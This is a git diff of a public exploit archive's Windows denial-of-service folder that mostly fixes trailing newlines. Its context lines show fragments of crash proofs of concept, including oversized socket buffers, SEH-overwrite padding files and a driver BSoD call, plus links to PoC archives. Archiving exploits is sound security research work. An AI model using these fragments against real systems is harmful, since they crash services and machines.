ngssoftware["LaunchGui"](foo, 1, 1); <BODY bgColor=#ffffff onload=init()> </BODY></HTML> -# milw0rm.com [2007-07-05] +# milw0rm.com [2007-07-05] \ No newline at end of file diff --git a/platforms/windows/dos/41596.py b/platforms/windows/dos/41596.py index 76b152cf1..d006e97c3 100755 --- a/platforms/windows/dos/41596.py +++ b/platforms/windows/dos/41596.py @@ -43,4 +43,4 @@ buffer+="Content-Length: 5900\r\n\r\n" s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect((host,port)) s.send(buffer) -s.close() +s.close() \ No newline at end of file diff --git a/platforms/windows/dos/41615.txt b/platforms/windows/dos/41615.txt index f834fbb87..cae023bb2 100755 --- a/platforms/windows/dos/41615.txt +++ b/platforms/windows/dos/41615.txt @@ -29,4 +29,4 @@ It appears MS17-013 finally fixed the vulnerability properly: https://technet.microsoft.com/en-us/library/security/ms17-013.aspx -@hosselot +@hosselot \ No newline at end of file diff --git a/platforms/windows/dos/41623.html b/platforms/windows/dos/41623.html index 1568f54d4..9db25e3bb 100755 --- a/platforms/windows/dos/41623.html +++ b/platforms/windows/dos/41623.html @@ -114,4 +114,4 @@ function main() { main(); -</script> +</script> \ No newline at end of file diff --git a/platforms/windows/dos/41629.py b/platforms/windows/dos/41629.py index ea02f6b94..6d84e5d25 100755 --- a/platforms/windows/dos/41629.py +++ b/platforms/windows/dos/41629.py @@ -43,7 +43,4 @@ file = open ('evilstring.txt', "w") file.write(evilstring) file.close -print evilstring - - - +print evilstring \ No newline at end of file diff --git a/platforms/windows/dos/41637.py b/platforms/windows/dos/41637.py index b2a977956..0004d23fe 100755 --- a/platforms/windows/dos/41637.py +++ b/platforms/windows/dos/41637.py @@ -50,7 +50,4 @@ Instruction how to use it: 3)Do you really change...? --> click NO!! Succesfully Exploitation!! -''' - - - +''' \ No newline at end of file diff --git a/platforms/windows/dos/41645.txt b/platforms/windows/dos/41645.txt index 786949583..4cffdda35 100755 --- a/platforms/windows/dos/41645.txt +++ b/platforms/windows/dos/41645.txt @@ -77,4 +77,4 @@ Since the additional detail is crucial to observe the symptoms of the bug and it Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41645.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41645.zip \ No newline at end of file diff --git a/platforms/windows/dos/41646.txt b/platforms/windows/dos/41646.txt index 00aba3b84..5c49c83ea 100755 --- a/platforms/windows/dos/41646.txt +++ b/platforms/windows/dos/41646.txt @@ -49,4 +49,4 @@ Attached is an archive with the original and modified TTF files. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41646.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41646.zip \ No newline at end of file diff --git a/platforms/windows/dos/41647.txt b/platforms/windows/dos/41647.txt index 5093b7d2f..2de9f1565 100755 --- a/platforms/windows/dos/41647.txt +++ b/platforms/windows/dos/41647.txt @@ -66,4 +66,4 @@ Attached is an archive with 3 crashing samples. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41647.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41647.zip \ No newline at end of file diff --git a/platforms/windows/dos/41648.txt b/platforms/windows/dos/41648.txt index 343003102..99b724342 100755 --- a/platforms/windows/dos/41648.txt +++ b/platforms/windows/dos/41648.txt @@ -64,4 +64,4 @@ Attached is an archive with 3 crashing samples. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41648.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41648.zip \ No newline at end of file diff --git a/platforms/windows/dos/41649.txt b/platforms/windows/dos/41649.txt index b423fa920..0f3cb56da 100755 --- a/platforms/windows/dos/41649.txt +++ b/platforms/windows/dos/41649.txt @@ -55,4 +55,4 @@ Attached is an archive with 2 crashing samples. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41649.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41649.zip \ No newline at end of file diff --git a/platforms/windows/dos/41650.txt b/platforms/windows/dos/41650.txt index 88fbc32b0..fbcc0bdbd 100755 --- a/platforms/windows/dos/41650.txt +++ b/platforms/windows/dos/41650.txt @@ -61,4 +61,4 @@ Attached is a proof of concept malformed font file which triggers the crash. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41650.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41650.zip \ No newline at end of file diff --git a/platforms/windows/dos/41651.txt b/platforms/windows/dos/41651.txt index 2528bc21f..66bebf067 100755 --- a/platforms/windows/dos/41651.txt +++ b/platforms/windows/dos/41651.txt @@ -85,4 +85,4 @@ Attached is an archive with 3 crashing samples. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41651.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41651.zip \ No newline at end of file diff --git a/platforms/windows/dos/41652.txt b/platforms/windows/dos/41652.txt index cf1cf9b9d..e301a637c 100755 --- a/platforms/windows/dos/41652.txt +++ b/platforms/windows/dos/41652.txt @@ -66,4 +66,4 @@ Attached is an archive with 3 crashing samples. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41652.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41652.zip \ No newline at end of file diff --git a/platforms/windows/dos/41653.txt b/platforms/windows/dos/41653.txt index 89b29cfcb..c8c8b4916 100755 --- a/platforms/windows/dos/41653.txt +++ b/platforms/windows/dos/41653.txt @@ -72,4 +72,4 @@ Attached is an archive with 2 crashing samples. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41653.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41653.zip \ No newline at end of file diff --git a/platforms/windows/dos/41654.txt b/platforms/windows/dos/41654.txt index 670d1bef7..0c15e5249 100755 --- a/platforms/windows/dos/41654.txt +++ b/platforms/windows/dos/41654.txt @@ -28,4 +28,4 @@ Attached is a proof of concept malformed font file which triggers the crash. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41654.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41654.zip \ No newline at end of file diff --git a/platforms/windows/dos/41655.txt b/platforms/windows/dos/41655.txt index c5bb58d2b..e773b7303 100755 --- a/platforms/windows/dos/41655.txt +++ b/platforms/windows/dos/41655.txt @@ -40,4 +40,4 @@ Attached is an archive with textual crash excerpts and up to 3 samples per each Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41655.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41655.zip \ No newline at end of file diff --git a/platforms/windows/dos/41656.txt b/platforms/windows/dos/41656.txt index a5bd0caa4..ebb908328 100755 --- a/platforms/windows/dos/41656.txt +++ b/platforms/windows/dos/41656.txt @@ -37,4 +37,4 @@ Attached is an archive with two samples, which trigger crashes at two different Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41656.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41656.zip \ No newline at end of file diff --git a/platforms/windows/dos/41657.txt b/platforms/windows/dos/41657.txt index 037178bc4..bad5e9329 100755 --- a/platforms/windows/dos/41657.txt +++ b/platforms/windows/dos/41657.txt @@ -80,4 +80,4 @@ Attached is a color profile which triggers the above crash. In order to reproduc Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41657.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41657.zip \ No newline at end of file diff --git a/platforms/windows/dos/41658.txt b/platforms/windows/dos/41658.txt index 1b535f475..1f821f15a 100755 --- a/platforms/windows/dos/41658.txt +++ b/platforms/windows/dos/41658.txt @@ -45,4 +45,4 @@ Attached is ane EMF file which triggers the crash. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41658.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41658.zip \ No newline at end of file diff --git a/platforms/windows/dos/41659.txt b/platforms/windows/dos/41659.txt index a88c91b23..6285c175d 100755 --- a/platforms/windows/dos/41659.txt +++ b/platforms/windows/dos/41659.txt @@ -27,4 +27,4 @@ Attached are two color profiles which trigger the crash at two different offsets Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41659.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41659.zip \ No newline at end of file diff --git a/platforms/windows/dos/41661.html b/platforms/windows/dos/41661.html index a8f8d4115..13c9091f5 100755 --- a/platforms/windows/dos/41661.html +++ b/platforms/windows/dos/41661.html @@ -127,4 +127,4 @@ Note: because the text allocations aren't protected by MemGC and happen on the p Screenshots: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41661.zip ---> +--> \ No newline at end of file diff --git a/platforms/windows/dos/41667.py b/platforms/windows/dos/41667.py index f331ca5d1..eea16ae18 100755 --- a/platforms/windows/dos/41667.py +++ b/platforms/windows/dos/41667.py @@ -33,4 +33,4 @@ httpsocket.send("GET " + crash + " HTTP/1.0\r\n\r\n") httpsocket.close() -print "SpyCamLizard shutted down!" +print "SpyCamLizard shutted down!" \ No newline at end of file diff --git a/platforms/windows/dos/4168.vbs b/platforms/windows/dos/4168.vbs index 09d40b8e3..26a55f6e0 100755 --- a/platforms/windows/dos/4168.vbs +++ b/platforms/windows/dos/4168.vbs @@ -125,4 +125,4 @@ oFS.Close Set oFS = Nothing Set oFSO = Nothing -' milw0rm.com [2007-07-10] +' milw0rm.com [2007-07-10] \ No newline at end of file diff --git a/platforms/windows/dos/41737.txt b/platforms/windows/dos/41737.txt index 1d868fd2d..9a9b4ec64 100755 --- a/platforms/windows/dos/41737.txt +++ b/platforms/windows/dos/41737.txt @@ -48,4 +48,4 @@ Win xp - + \ No newline at end of file diff --git a/platforms/windows/dos/41755.py b/platforms/windows/dos/41755.py index 4c18c9b20..4068504ab 100755 --- a/platforms/windows/dos/41755.py +++ b/platforms/windows/dos/41755.py @@ -55,4 +55,4 @@ while True: conn.send(exploit+'\r\n') conn.close() print "" - print "Succesfully exploitation!" + print "Succesfully exploitation!" \ No newline at end of file diff --git a/platforms/windows/dos/41823.py b/platforms/windows/dos/41823.py index e4105585b..cff50ee23 100755 --- a/platforms/windows/dos/41823.py +++ b/platforms/windows/dos/41823.py @@ -39,4 +39,4 @@ exit() -s.close() +s.close() \ No newline at end of file diff --git a/platforms/windows/dos/41879.txt b/platforms/windows/dos/41879.txt index c73fa5a75..414cc4b6b 100755 --- a/platforms/windows/dos/41879.txt +++ b/platforms/windows/dos/41879.txt @@ -151,4 +151,4 @@ Attached is a PoC program for Windows 7 32-bit (usermode_oob_write.cpp), and a b Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41879.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41879.zip \ No newline at end of file diff --git a/platforms/windows/dos/41880.cpp b/platforms/windows/dos/41880.cpp index 9e58cf359..dd7ec5102 100755 --- a/platforms/windows/dos/41880.cpp +++ b/platforms/windows/dos/41880.cpp @@ -209,4 +209,4 @@ int main() { DestroyWindow(hwnd); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/41889.rb b/platforms/windows/dos/41889.rb index b221c552b..e7f3aa5df 100755 --- a/platforms/windows/dos/41889.rb +++ b/platforms/windows/dos/41889.rb @@ -416,4 +416,4 @@ class Metasploit3 < Msf::Auxiliary end return end -end +end \ No newline at end of file diff --git a/platforms/windows/dos/41891.rb b/platforms/windows/dos/41891.rb index 6a6ff7437..24749e34e 100755 --- a/platforms/windows/dos/41891.rb +++ b/platforms/windows/dos/41891.rb @@ -138,4 +138,4 @@ class MetasploitModule < Msf::Auxiliary pkt.to_s end -end +end \ No newline at end of file diff --git a/platforms/windows/dos/419.pl b/platforms/windows/dos/419.pl index 656a6c91e..a85f160c8 100755 --- a/platforms/windows/dos/419.pl +++ b/platforms/windows/dos/419.pl @@ -71,4 +71,4 @@ $l++; } } -# milw0rm.com [2004-08-26] +# milw0rm.com [2004-08-26] \ No newline at end of file diff --git a/platforms/windows/dos/41911.py b/platforms/windows/dos/41911.py index 8d098c838..e343ded7a 100755 --- a/platforms/windows/dos/41911.py +++ b/platforms/windows/dos/41911.py @@ -38,6 +38,4 @@ nSEH = "\x42\x42\x42\x42" SEH = "\x43\x43\x43\x43" f = open ("poc.txt", "w") f.write(buffer + nSEH + SEH) -f.close() - - +f.close() \ No newline at end of file diff --git a/platforms/windows/dos/41916.py b/platforms/windows/dos/41916.py index fffc50ae7..3599e9811 100755 --- a/platforms/windows/dos/41916.py +++ b/platforms/windows/dos/41916.py @@ -16,7 +16,4 @@ SEH = "\x43" * 4 junkD = "\x44" * 9000 f = open ("poc.txt", "w") f.write(junkA + nSEH + SEH + junkD) -f.close() - - - +f.close() \ No newline at end of file diff --git a/platforms/windows/dos/41945.c b/platforms/windows/dos/41945.c index 6c4c18193..9e0110605 100755 --- a/platforms/windows/dos/41945.c +++ b/platforms/windows/dos/41945.c @@ -85,5 +85,4 @@ int main() CloseHandle(hFile); printf("Resources freed up.\r\n"); return 0; -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/42001.py b/platforms/windows/dos/42001.py index 302837a24..f387bb861 100755 --- a/platforms/windows/dos/42001.py +++ b/platforms/windows/dos/42001.py @@ -18,7 +18,4 @@ bufff = "\x43" * 4 buffff = "\x44" * 9999 f = open ("poc.tif", "w") f.write(buf + buff + bufff + buffff) -f.close() - - - +f.close() \ No newline at end of file diff --git a/platforms/windows/dos/42002.txt b/platforms/windows/dos/42002.txt index be898171f..97aba5e21 100755 --- a/platforms/windows/dos/42002.txt +++ b/platforms/windows/dos/42002.txt @@ -18,7 +18,4 @@ bufff = "\x43" * 4 buffff = "\x44" * 9999 f = open ("poc.tif", "w") f.write(buf + buff + bufff + buffff) -f.close() - - - +f.close() \ No newline at end of file diff --git a/platforms/windows/dos/42007.cpp b/platforms/windows/dos/42007.cpp index b297b72dd..408a522e9 100755 --- a/platforms/windows/dos/42007.cpp +++ b/platforms/windows/dos/42007.cpp @@ -100,4 +100,4 @@ int main() { } return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/42008.cpp b/platforms/windows/dos/42008.cpp index 1365a28c6..45bc16c07 100755 --- a/platforms/windows/dos/42008.cpp +++ b/platforms/windows/dos/42008.cpp @@ -163,4 +163,4 @@ int main() { DestroyWindow(hwnd); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/42009.txt b/platforms/windows/dos/42009.txt index e7561558c..28bd5d6e1 100755 --- a/platforms/windows/dos/42009.txt +++ b/platforms/windows/dos/42009.txt @@ -209,4 +209,4 @@ The issue reproduces on Windows 7, and is easiest to observe with Special Pools Proofs of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42009.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42009.zip \ No newline at end of file diff --git a/platforms/windows/dos/42021.txt b/platforms/windows/dos/42021.txt index 6e885fb80..0fc0f4d43 100755 --- a/platforms/windows/dos/42021.txt +++ b/platforms/windows/dos/42021.txt @@ -87,4 +87,4 @@ It did it! Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42021.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42021.zip \ No newline at end of file diff --git a/platforms/windows/dos/42040.py b/platforms/windows/dos/42040.py index 64a51e834..8885ce4fc 100755 --- a/platforms/windows/dos/42040.py +++ b/platforms/windows/dos/42040.py @@ -30,4 +30,4 @@ print "[+] Creating file with %d bytes..." % len(buf) f=open("exp.std",'wb') f.write(buf) -f.close() +f.close() \ No newline at end of file diff --git a/platforms/windows/dos/4205.pl b/platforms/windows/dos/4205.pl index 17f29f2cf..a20b01b83 100755 --- a/platforms/windows/dos/4205.pl +++ b/platforms/windows/dos/4205.pl @@ -44,4 +44,4 @@ my $tmp; print $tmp; close($sock); -# milw0rm.com [2007-07-20] +# milw0rm.com [2007-07-20] \ No newline at end of file diff --git a/platforms/windows/dos/42073.py b/platforms/windows/dos/42073.py index 1b36f6bce..14803b3d7 100755 --- a/platforms/windows/dos/42073.py +++ b/platforms/windows/dos/42073.py @@ -24,6 +24,4 @@ instruction = ''' print author print overflow -print instruction - - +print instruction \ No newline at end of file diff --git a/platforms/windows/dos/42081.txt b/platforms/windows/dos/42081.txt index a56182d62..8b7f2b4d1 100755 --- a/platforms/windows/dos/42081.txt +++ b/platforms/windows/dos/42081.txt @@ -32,4 +32,4 @@ Attached is a ZIP archive (password: "mpengbugs") with up to 3 testcases for eac Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42081.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42081.zip \ No newline at end of file diff --git a/platforms/windows/dos/4215.pl b/platforms/windows/dos/4215.pl index d79dfa362..c49df9be7 100755 --- a/platforms/windows/dos/4215.pl +++ b/platforms/windows/dos/4215.pl @@ -46,4 +46,4 @@ print gif "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; close(gif); print "ok\n\nok Gif Exploit Creat and run exploit and wait :)\n"; -# milw0rm.com [2007-07-23] +# milw0rm.com [2007-07-23] \ No newline at end of file diff --git a/platforms/windows/dos/42182.cpp b/platforms/windows/dos/42182.cpp index 23b0b82bc..0b6d94950 100755 --- a/platforms/windows/dos/42182.cpp +++ b/platforms/windows/dos/42182.cpp @@ -42,4 +42,4 @@ int _tmain(int argc, _TCHAR* argv[]) BSoD("\\\\.\\aswSnx"); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/422.c b/platforms/windows/dos/422.c index eaf10d02c..dda21d922 100755 --- a/platforms/windows/dos/422.c +++ b/platforms/windows/dos/422.c @@ -498,4 +498,4 @@ void painkiller_pckpwd(unsigned char *pwd, unsigned char *enc) { } } -// milw0rm.com [2004-08-27] +// milw0rm.com [2004-08-27] \ No newline at end of file diff --git a/platforms/windows/dos/42210.cpp b/platforms/windows/dos/42210.cpp index e1efe19cf..4d0a31c0c 100755 --- a/platforms/windows/dos/42210.cpp +++ b/platforms/windows/dos/42210.cpp @@ -160,4 +160,4 @@ int main() { DeleteDC(hdc); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/42211.cpp b/platforms/windows/dos/42211.cpp index 8ba2c84b8..2b6bf35f3 100755 --- a/platforms/windows/dos/42211.cpp +++ b/platforms/windows/dos/42211.cpp @@ -129,4 +129,4 @@ int main() { CloseHandle(hksecdd); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/42212.cpp b/platforms/windows/dos/42212.cpp index bc751710a..22875b0a6 100755 --- a/platforms/windows/dos/42212.cpp +++ b/platforms/windows/dos/42212.cpp @@ -174,4 +174,4 @@ int main() { CloseHandle(hMntPointMgr); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/42213.cpp b/platforms/windows/dos/42213.cpp index 5b9a5ce2f..73301b135 100755 --- a/platforms/windows/dos/42213.cpp +++ b/platforms/windows/dos/42213.cpp @@ -242,4 +242,4 @@ int main() { WmiCloseBlock(hwmi); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/42214.txt b/platforms/windows/dos/42214.txt index 8cc37e716..13f454312 100755 --- a/platforms/windows/dos/42214.txt +++ b/platforms/windows/dos/42214.txt @@ -41,4 +41,4 @@ The issue can be reproduced by running the attached proof-of-concept program on Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42214.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42214.zip \ No newline at end of file diff --git a/platforms/windows/dos/42215.cpp b/platforms/windows/dos/42215.cpp index 973d71b3e..91f842cbb 100755 --- a/platforms/windows/dos/42215.cpp +++ b/platforms/windows/dos/42215.cpp @@ -79,4 +79,4 @@ int main() { CloseHandle(hDisk); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/42216.cpp b/platforms/windows/dos/42216.cpp index 9c676f479..985c46e24 100755 --- a/platforms/windows/dos/42216.cpp +++ b/platforms/windows/dos/42216.cpp @@ -89,4 +89,4 @@ int main() { CloseHandle(hDisk); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/42217.cpp b/platforms/windows/dos/42217.cpp index 01859b2e2..73ca27018 100755 --- a/platforms/windows/dos/42217.cpp +++ b/platforms/windows/dos/42217.cpp @@ -101,4 +101,4 @@ int main() { CloseHandle(hDisk); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/42218.cpp b/platforms/windows/dos/42218.cpp index df185e6a2..3292df323 100755 --- a/platforms/windows/dos/42218.cpp +++ b/platforms/windows/dos/42218.cpp @@ -103,4 +103,4 @@ int main() { CloseHandle(hDisk); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/42219.cpp b/platforms/windows/dos/42219.cpp index 5ac983890..b2ff74ff1 100755 --- a/platforms/windows/dos/42219.cpp +++ b/platforms/windows/dos/42219.cpp @@ -107,4 +107,4 @@ int main() { RemoveDirectory(L"a"); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/42220.cpp b/platforms/windows/dos/42220.cpp index 3049c6120..9be989a1e 100755 --- a/platforms/windows/dos/42220.cpp +++ b/platforms/windows/dos/42220.cpp @@ -188,4 +188,4 @@ int main() { RaiseException(1337, 0, 0, NULL); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/42223.cpp b/platforms/windows/dos/42223.cpp index 5e15f923e..980af50e9 100755 --- a/platforms/windows/dos/42223.cpp +++ b/platforms/windows/dos/42223.cpp @@ -78,4 +78,4 @@ int main() { PrintHex((PBYTE)&logfont, sizeof(logfont)); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/42224.cpp b/platforms/windows/dos/42224.cpp index 3fb75b449..ef2ddecfa 100755 --- a/platforms/windows/dos/42224.cpp +++ b/platforms/windows/dos/42224.cpp @@ -114,4 +114,4 @@ int main() { DeleteDC(hdc); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/42225.cpp b/platforms/windows/dos/42225.cpp index b62304814..33ea80f1a 100755 --- a/platforms/windows/dos/42225.cpp +++ b/platforms/windows/dos/42225.cpp @@ -88,4 +88,4 @@ int main() { DeleteDC(hdc); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/42226.cpp b/platforms/windows/dos/42226.cpp index 60b1fedb7..c038d0f94 100755 --- a/platforms/windows/dos/42226.cpp +++ b/platforms/windows/dos/42226.cpp @@ -133,4 +133,4 @@ int main() { DeleteDC(hdc); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/42227.cpp b/platforms/windows/dos/42227.cpp index a010a983f..a296029c4 100755 --- a/platforms/windows/dos/42227.cpp +++ b/platforms/windows/dos/42227.cpp @@ -181,4 +181,4 @@ int main() { DeleteDC(hic); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/42228.cpp b/platforms/windows/dos/42228.cpp index 98856b4dd..55ef877ed 100755 --- a/platforms/windows/dos/42228.cpp +++ b/platforms/windows/dos/42228.cpp @@ -216,4 +216,4 @@ int main() { CloseHandle(hJob); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/42229.cpp b/platforms/windows/dos/42229.cpp index a706db4a8..ab4336e2f 100755 --- a/platforms/windows/dos/42229.cpp +++ b/platforms/windows/dos/42229.cpp @@ -145,4 +145,4 @@ int main() { PrintHex((PBYTE)&counters, ReturnLength); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/42230.txt b/platforms/windows/dos/42230.txt index 93abc2276..eee86db7f 100755 --- a/platforms/windows/dos/42230.txt +++ b/platforms/windows/dos/42230.txt @@ -29,4 +29,4 @@ Repeatedly triggering the vulnerability could allow local authenticated attacker Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42230.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42230.zip \ No newline at end of file diff --git a/platforms/windows/dos/42231.cpp b/platforms/windows/dos/42231.cpp index 0fc98b353..54e329262 100755 --- a/platforms/windows/dos/42231.cpp +++ b/platforms/windows/dos/42231.cpp @@ -133,4 +133,4 @@ int main() { CloseHandle(hJob); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/42232.cpp b/platforms/windows/dos/42232.cpp index ad99de73e..d50b19676 100755 --- a/platforms/windows/dos/42232.cpp +++ b/platforms/windows/dos/42232.cpp @@ -109,4 +109,4 @@ int main() { CloseHandle(hJob); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/42233.cpp b/platforms/windows/dos/42233.cpp index c3b59b62c..18de910f6 100755 --- a/platforms/windows/dos/42233.cpp +++ b/platforms/windows/dos/42233.cpp @@ -106,4 +106,4 @@ int main() { CloseHandle(hTransaction); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/42234.txt b/platforms/windows/dos/42234.txt index 34bf8ee40..49c9056ad 100755 --- a/platforms/windows/dos/42234.txt +++ b/platforms/windows/dos/42234.txt @@ -81,4 +81,4 @@ Attached are 6 proof of concept malformed font files which trigger the crash. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42234.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42234.zip \ No newline at end of file diff --git a/platforms/windows/dos/42235.txt b/platforms/windows/dos/42235.txt index 4634cb260..e4ca18ee8 100755 --- a/platforms/windows/dos/42235.txt +++ b/platforms/windows/dos/42235.txt @@ -76,4 +76,4 @@ Attached are 3 proof of concept malformed font files which trigger the crash. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42235.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42235.zip \ No newline at end of file diff --git a/platforms/windows/dos/42236.txt b/platforms/windows/dos/42236.txt index 70a23d4cc..425b6cfe6 100755 --- a/platforms/windows/dos/42236.txt +++ b/platforms/windows/dos/42236.txt @@ -44,4 +44,4 @@ Attached are 2 proof of concept malformed font files which trigger the crash. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42236.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42236.zip \ No newline at end of file diff --git a/platforms/windows/dos/42237.txt b/platforms/windows/dos/42237.txt index a093247c5..24789884d 100755 --- a/platforms/windows/dos/42237.txt +++ b/platforms/windows/dos/42237.txt @@ -42,4 +42,4 @@ Attached is a proof of concept malformed font file which triggers the crash. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42237.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42237.zip \ No newline at end of file diff --git a/platforms/windows/dos/42238.txt b/platforms/windows/dos/42238.txt index b6ff5d54a..13139df22 100755 --- a/platforms/windows/dos/42238.txt +++ b/platforms/windows/dos/42238.txt @@ -46,4 +46,4 @@ Attached are 3 proof of concept malformed font files which trigger the crash. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42238.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42238.zip \ No newline at end of file diff --git a/platforms/windows/dos/42239.txt b/platforms/windows/dos/42239.txt index 92a37db14..f32c94cc4 100755 --- a/platforms/windows/dos/42239.txt +++ b/platforms/windows/dos/42239.txt @@ -73,4 +73,4 @@ Attached are 3 proof of concept malformed font files which trigger the crash. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42239.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42239.zip \ No newline at end of file diff --git a/platforms/windows/dos/42240.txt b/platforms/windows/dos/42240.txt index 7d91563e7..4fad94ece 100755 --- a/platforms/windows/dos/42240.txt +++ b/platforms/windows/dos/42240.txt @@ -44,4 +44,4 @@ Attached are 3 proof of concept malformed font files which trigger the crash. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42240.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42240.zip \ No newline at end of file diff --git a/platforms/windows/dos/42241.txt b/platforms/windows/dos/42241.txt index fb79dd687..492cdfee9 100755 --- a/platforms/windows/dos/42241.txt +++ b/platforms/windows/dos/42241.txt @@ -46,4 +46,4 @@ Attached are 2 proof of concept malformed font files which trigger the crash. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42241.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42241.zip \ No newline at end of file diff --git a/platforms/windows/dos/42242.cpp b/platforms/windows/dos/42242.cpp index eb98ba5a3..995f5c033 100755 --- a/platforms/windows/dos/42242.cpp +++ b/platforms/windows/dos/42242.cpp @@ -123,4 +123,4 @@ int main() { CloseHandle(hResource); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/42243.txt b/platforms/windows/dos/42243.txt index d3c2901d6..35805deea 100755 --- a/platforms/windows/dos/42243.txt +++ b/platforms/windows/dos/42243.txt @@ -82,4 +82,4 @@ The issue reproduces on Windows 7 (other platforms untested). It is easiest to r Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42243.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42243.zip \ No newline at end of file diff --git a/platforms/windows/dos/42244.cpp b/platforms/windows/dos/42244.cpp index dd0be6f57..55fde2274 100755 --- 